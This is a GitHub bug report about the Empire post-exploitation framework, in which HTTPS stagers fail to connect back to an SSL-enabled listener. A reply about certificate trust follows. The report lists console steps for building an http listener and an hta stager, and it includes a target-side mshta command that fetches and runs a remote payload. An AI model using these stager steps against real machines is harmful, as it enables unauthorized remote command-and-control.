[BUG] Stagers cannot connect back to http listeners over ssl

Open captain-woof opened this issue 3 years ago • 1 comments

Note: Please fill out all sections (if applicable) and do not delete the below section headers, otherwise the bot will close the issue.

Empire Version

  • Empire 4.0.0+gitsubmodule-0kali2

OS Information (Linux flavor, Python version)

  • OS: Kali
  • Python: 3.9

Describe the bug

Creating an http listener with ssl enabled, generating a stager to call back to that listener, and then executing that stager on the target does not create a connection at all. I tested this in a non-AV environment, Windows 10.

To Reproduce

Steps to reproduce the behavior:

  1. uselistener http
  2. set SSL True
  3. set CertPath path-to-dir
  4. set Host host
  5. set Port port
  6. execute
  7. usestager windows/hta (or csharp_exe, it doesn't matter which one)
  8. set Listener http (Didn't change the name for this test)
  9. execute

Then on target machine, mshta https://my-host:port/payload.hta

Expected behavior

A prompt asking user whether to trust the certificate, and creating a connection back when clicked on 'Yes'.

Screenshots

If needed, please ask.

Additional context

None.

captain-woof, Jul 18 '21 03:07

Have you tried adding the private cert to the target's Windows cert storage? In a testing environment you can always do this. During an assessment you would of course use valid certs.

janit0rjoe, Jul 22 '21 18:07